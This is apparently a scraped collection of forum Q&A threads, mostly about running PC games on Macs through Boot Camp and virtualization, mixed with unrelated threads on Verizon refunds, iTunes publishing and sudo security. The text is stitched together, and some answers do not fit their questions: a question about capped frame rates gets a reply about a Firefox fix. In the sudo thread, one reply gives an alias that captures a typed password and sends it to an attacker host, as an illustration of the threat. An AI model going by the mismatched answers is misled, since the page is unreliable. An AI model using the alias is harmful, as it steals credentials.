Do you play computer games ? What is your favourit game ?

Hi all,
any gamers here ? Do you like to play computer games ? I'd like to play World of Warcraft.
What do you play ?
Regards

Woah, when I saw the subject of this thread I expected to find here the most geeky games ever :).
I like most of the games I have readed but since 4 years ago I enjoy more and more 'special games', specialy turn-based WEGO (as you always have the time to make another turn, maybe not today but sure tomorrow).
So I will tell you this game. Have in mind when you read the tittle that this is one of teh (yes, teh) greatests games ever. Also is one of the more adictives, it will completely frustrate you for the first two weeks, later you will overpower the AI and then you will join MP games.
Once that happens you are in and there's no way out. I don't want any responsability, stop reading NOW if you are not up for it.
Dominions 3.
The graphics... well, almost spectrum128K-like : ). It is an strategy game X4 turn-based with like 2000 diferent units and LOADS of different nations.
It is great, there is a very dedicted community (albeit some small) creating loads of games and forum discussions.
I also enjoy a lot the Combat Mission series but I no longer play those since I don't have much time and instead of playing other games I just get into more Dominons 3 MP games.
OMG I can't wait to receive my turn and see what has happened to my army, my mages and my Seraphin. They are fighting another army of sacred warriors with a Demon Lord on it.
P.D.: I just play it, I swear I don't sell it : ).
P.P.D.: Despite the bad graphics it was released last year I think.

  • Can i use a superdrive to play computer game discs? (Running Windows?)

Can I use my USB Superdrive to play computer games on a macbook air running windows?

Of course. Just connect the Apple USB SuperDrive to your Mac and insert the DVD with the game. You may need to install it first.
You may need to install the Windows support software, too. Look for your MacBook Air model and your Windows version, and install the correct Windows support software > http://support.apple.com/kb/HT5634?viewlocale=en_US&locale=en_US

  • If you switch your mac to pc can you play Pc games?

I was curous, when you switch your mac with bootcamp, can you play games that play on the PC?

If you mean if you have a Windows partition using BootCamp... you can use Windows to play games for a PC.
It's not switching your Mac to PC. Using BootCamp you will have the option to boot into Mac OS X or Windows.
If you have't used BootCamp yet, read the installation and setup guide.

The game minimum specifications are just a start when considering a computer that can run games, then you add more for what the computer's OS needs to run, plus any other things you may hope it could do during the time you were gaming; such as check email, be online with some other application, edit a movie, and other tasks away from gaming.
The MacBook Pro series has several superior characteristics that my semi-comatose iBook G4 and dizzy first-edition MacBook coreduo 1.83GHz could only dream about.
When you look into the online store, the sales page for each has add-ons that are possible and some are built-to-order upgrades. Since all the MB/Pros have Retina displays, except the basic model which has the only internal optical drive offered. Unless you also look into the Apple Special Deals refurbished online store to check for current inventory, that's about it. If you get a model where you can add the upgrade RAM yourself, that is one thing; but more of them now are installed before you get it and have few user-upgrade paths in hardware. Consider this hardware can run Windows, unix, OS X, etc. More RAM and more storage (SSD, Fusion, HDD) capacity is good.

    http://store.apple.com/us/buy-mac/macbook-pro
Some great stuff. But watch for the specificiations because the 'minimum for a game' is not the minimum necessary for a great experience. And the options for a fast SSD or Apple Fusion drive should be looked into, those kinds of options are not added to an existing offer in the refurbished store sales page. However they do have a good complementary support/service plan which is upgradable to the full AppleCare optional plan just as regular store models are.
Not sure if your question was answered by me.
But that green checkmark looks funny. I bet
that duck had something to do with it...!
    Good luck & happy computing!

  • HT1461 Can one use boot camp to play computer games normally only found for PCs?

I have some older computer games, specifically Warhammer 40k rts games, that I woud still like to play and was curious if boot camp would allow me to play those on my mac? Also, if it is possible am I putting my computer at risk in any way? I'd like to play them but not so badly that I would be damaging my mac pro or shortening its lifespan. There dont appear to be any emulators out there currently so I'm checking here to see if anyone knows anything.

Yes. There are several ways to run Windows on the Mac:
    Windows on Intel Macs
There are presently several alternatives for running Windows on Intel Macs.
         1. Install the Apple Boot Camp software.  Purchase Windows
XP w/Service Pak2, Vista, or Windows 7.  For Boot Camp
4.0 and above you can only use Windows 7 or later. Follow
instructions in the Boot Camp documentation on
installation of Boot Camp, creating Driver CD, and
installing Windows.  Boot Camp enables you to boot the
computer into OS X or Windows.
         2. Parallels Desktop for Mac and Windows XP, Vista Business,
Vista Ultimate, or Windows 7.  Parallels is software
virtualization that enables running Windows concurrently
             with OS X.
         3. VM Fusion and Windows XP, Vista Business, Vista Ultimate,
or Windows 7.  VM Fusion is software virtualization that
enables running Windows concurrently with OS X.
         4. CrossOver which enables running many Windows
applications without having to install Windows.  The
Windows applications can run concurrently with OS X.
         5. VirtualBox is an Open Source freeware virtual machine such
as VM Fusion and Parallels that was developed by Solaris.
It is not as fully developed for the Mac as Parallels and VM
             Fusion.
Note that VirtualBox, Parallels, and VM Fusion can also run other operating systems such as Linux, Unix, OS/2, Solaris, etc.  There are performance differences between dual-boot systems and virtualization.  The latter tend to be a little slower (not much) and do not provide the video performance of the dual-boot system. See MacTech Labs- Virtualization Benchmarks, January 2013 | MacTech for comparisons of Boot Camp, Parallels, and VM Fusion. Benchmarks of all of the above except Crossover can be found in Benchmarking Parallels, Fusion, and VirtualBox Against Boot Camp - The Mac Observer. Boot Camp is only available with Leopard or later. Except for Crossover and a couple of similar alternatives like DarWine you must have a valid installer disc for Windows.
You must also have an internal optical drive for installing Windows. Windows cannot be installed from an external optical drive.

  • HT5071 The process of getting your book on the iTunes store is very complicated and frustrating. After delivering your book through iTunes Producer it gives you the BIG TICK and after that you have no idea what stage your book is at.

In addition to sell your book on iTunes is a huge exercise, requiring US taxation file numbers that you have to apply directly to the tax office in the US. Once you have done that you then have to jump through several other hoops in iTunes system to be able to sell your books. Then of course I have already explaine the difficulty that I have had to get my book in the store.

I assume if you have submitted your  book.. you have already completed Apples requirements for a paid book account.
Its quite simple, Apple own the ball.. if you want to play the game... get your boots on and start running.. not standing on the sidelines and shouting FOUL  just because its not going as you expect!

  • How do you play clash of clans on your backbook air if you have iphone or ipad?

Hi was wondering how you can play clash of clans on your macbook air?
i have tried many things to play it. but how come we can not play it or how we can play it on macbook instead of playing on ipad or not?
    please let me know

Mac computers have a different operating system than the iPad. Applications programmed for one will not run on the other, although some software developers make two very similar versions where one will run on each operating system. Clash of Clans has made versions for iOS and Android but not for the Macintosh or Windows computers.

  • Playing Computer games on a Macbook

I own a MacBook with an Intel Core 2 Duo Processor, 1GB of RAM, a 2.0 GHz Processor, and a GMA graphics card. Will it be able to handle graphic intense games, like Quake, Doom, Halo? Thank you!
MacBook   Mac OS X (10.4.9)   Black w/ 2GHz Processor, 1 GB RAM, 120 GB Hard Drive

Well - most likely not on the OSX side. If you like to play games I suggest installing Windows XP using bootcamp and playing your 3D games there. Windows utilizes the GMA950 better than OSX and you also got the directX 9.0c to help you out.
I've played games like Call of Duty (original) on highest settings with no problems - mind you I got 2 Gb of RAM.
I also played HalfLife2 on medium to low settings and got great FPS - but once in a while the game crashed - dunno why.
I heard that Sims2 is very much playable on Windows XP Macbook - but I can't tell you about Doom3 or Halo. Search Youtube and see if someone has done it. I don't suppose that DOOM3 would play very well - that game is very GPU intensive - but you can give it a try

  • Can You Offer Clarity - Who, What, When Your Eligible for Promotional Refund

In our town we have two retailers which are literally blocks mile from each other; Verizon Wireless 76 Dodge St., 01915 and Verizon Wireless at 136 Dodge St., 01915.  I'm sifting through the VWZ website to better understand the promotion and to better understand given the information shared at "Verizon Wireless 136 Dodge St....".
I've been a customer of VWZ for years and have opted not to go to 76 Dodge St. given the years of poor customer service experience at that particular location and return to 136 Dodge St given their great customer service.  Now I read your posting as I comb through the readings to learn more about the promotion to help better understand who, what and under what circumstances you are eligible to receive the promotional upgrade.
I only went to the store today given the VWZ website did not allow me to change my plan to from nationwide to single place and pre-order the phone.  My frustration mounted when I went to the store I was at today stated VWZ "misinformed the public..." and the $200 upgrade really should really have read, "...receive up to a $200 refund..." -- that is, I would only receive the cost of the appraised value of the iPhone 4S which is only know after I submit the item to VWZ.  Here I read this post which you indicate it's only available at "Verizon Wireless" which leaves be baffled - does this include authorized retailers who print receipts stating "Verizon Wireless, 136 Dode St... or what?  The only reason why I remained with VMZ (it wasn't for the customer service), was the promotional offer and the new single plan being offered.  If this is not the case, I like to void this order (which I won't be surprised I'll be charged) and start shopping around at other carriers.  I admit this promotional offering is very clear with no clear indication on who, what and under what circumstance you are eligible and the cost you will encounter.

i've never pay close attention to this problem, until one day i open a terminal and type

I mean, isn't it stupid that someone who has my user password can easily get my root access? What is my long, complex root password for?
Later on I even think of more cases where I can jump to a root session with just my user password.---sudo vim ; sudo bash,eg.
Google around and search arch forum didn't give me much.
BTW, I just went across this Linux Journal passage http://www.linuxjournal.com/content/sto … r-password. there is a comment claiming that sudo is not safe.
Anonymous from LinuxJournal wrote: su is a perfectly safe command, sudo is not. When you have work to do, you don't (or shouldn't) have time to find that sudo isn't configured for what you need to do- or worse, that it's misconfigured and you have a glaring security hole on your server. This happens everyday.
So how do you guys think?
I think NOEXEC is the sudo option you're looking for. It prevents sudo processes from spawning child processes, which may or may not be a shell. Use it in conjunction with a specific, known-to-be-secure command line, and you can mitigate the problem you're talking about. Personally, I don't use su nor sudo anymore. Instead I log into my passwordless root account from another TTY, which getty permits by default. su and ssh deny access to passwordless accounts, so I don't really see it as a security problem.
Furthermore, I think your concern is misplaced: if someone had access to your user password, there is far more he or she could do beyond using sudo (install a keylogger, alias sudo='read -p Password > /dev/tcp/attacker.com/1234', gdb(1), ptrace(2), etc). More realistic threats are usually those involving privilege escalation by other users or programs without the use of su/sudo.
Edit: see also man sudo(1) and sudoers.conf(5).

  • How can you play facebook games on ipad

Cafe world etc says need flash player? If these wont work I would not have purchased ipad in the first place

    John,
iOS devices have NEVER supported flash.  Perhaps you should have done a bit of research before plunking down hundreds of dollars on the iPad.

  • Playing computer games with Virtualbox

I have a Macbook Pro laptop, but we also have a PC desktop running on Windows XP home edition. I'm trying to get Zoo Tycoon 2 to run on my mac, and I uploaded the windows xp software using virtualbox. Everything worked great, a huge relief because there always seems to be a problem...well, there is. i have to keep the xp software disk inside the computer while my VM is running, which means that i can't put the zoo tycoon 2 software inside...hm...solutions?

sorry i was just being stupid! i just made sure vbox was being installed on hard drive, cd/dvd, and floppy and then took out the windows xp disc before i ran the xp vm (virtual machine) and it still ran. there seems to be an issue with virtualbox when it comes to being able to eject disks.

  • I play computer games under macosx...

I ve noticed that Mountain Lion ( PUMA) is capping fps to 60 blank_mode=1 is there anyway of changing it ? to 0 ive searched and i couldnt find a solution.. thanks in advanced

Mozilla are aware of the issue and are working on a fix, no timescale but they are planning on a quick release. Firefox 3.6.15 will fix the issue with some Java applets not working, which has caused many Pogo games to stop functioning.

  • Playing PC games.

Can anyone tell me how to play PC games on my MAC Mini?

Call of Duty is available for the Mac: Call of Duty and Call of Duty Deluxe and the Mac mini meets the system requirements. I don't play computer games, so I can't say how well it will run, but I'm sure other people can tell you.
Counter Strike is not available for the Mac from what I can tell. Neither is Half-Life which would be necessary for Counter-Strike to be available.
The two biggest Mac games publishers are probably Aspyr and MacSoft. Check their sites for more games for the Mac.

  • Can you play music to wireless and wired speakers at the same time?

If you have Airport express, can you play music on speakers plugged into the airport express at the same time as you play from speakers attached to your computer?
    Thanks

Yes you can. In the bottom right hand corner of the iTunes main window there is a drop down menu. Select the AirPort Express base station(s) you'd like to send your music to and also select 'Computer'. Not only will it play through all, it will play IN SYNC!
I can't remember with which version of iTunes this was introduced, best to grab the latest version to be sure.
